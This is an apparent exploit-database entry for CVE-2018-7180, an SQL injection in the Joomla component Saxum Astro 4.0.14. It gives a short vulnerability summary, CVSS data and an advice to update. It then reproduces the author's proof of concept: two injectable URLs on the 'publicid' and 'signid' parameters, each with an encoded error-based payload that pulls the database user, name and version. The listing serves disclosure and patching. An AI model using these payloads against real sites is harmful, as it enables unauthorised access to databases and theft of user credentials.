Joomla! Component Saxum Astro 4.0.14 - SQL Injection

vendor:

Saxumastro

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Saxumastro

Affected Version From: 4.0.14

Affected Version To: 4.0.14

Patch Exists: YES

Related CWE: CVE-2018-7180

CPE: a:saxum2003:saxumastro:4.0.14

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component Saxum Astro 4.0.14 – SQL Injection

Joomla! Component Saxum Astro 4.0.14 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'publicid' and 'signid' parameters of the 'index.php' script. An attacker can send a malicious SQL query to the vulnerable script in order to dump the database content. This can be exploited to gain access to sensitive information such as usernames and passwords.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the software.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Saxum Astro 4.0.14 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.saxum2003.hu/
# Software Link: https://extensions.joomla.org/extensions/extension/living/astrology-a-horoscope/saxumastro/
# Software Download: http://www.saxum2003.hu/downloadsen/file/93-astro4.html
# Version: 4.0.14
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7180
# # # # # 
# Exploit Author: Ihsan Sencan
# # # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_saxumastro&view=savedreading&publicid=[SQL]
# 
# JTMxJTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTJk
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_saxumastro&view=interpret&typeid=1&signid=[SQL]
# 
# JTMxJTI5JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM2JTM2JTM1JTM1JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTM1JTM1JTNkJTM2JTM2JTM1JTM1JTJjJTMxJTI5JTI5JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI4JTM5JTMyJTM3JTMxJTNkJTM5JTMyJTM3JTMx
# 
# # # # #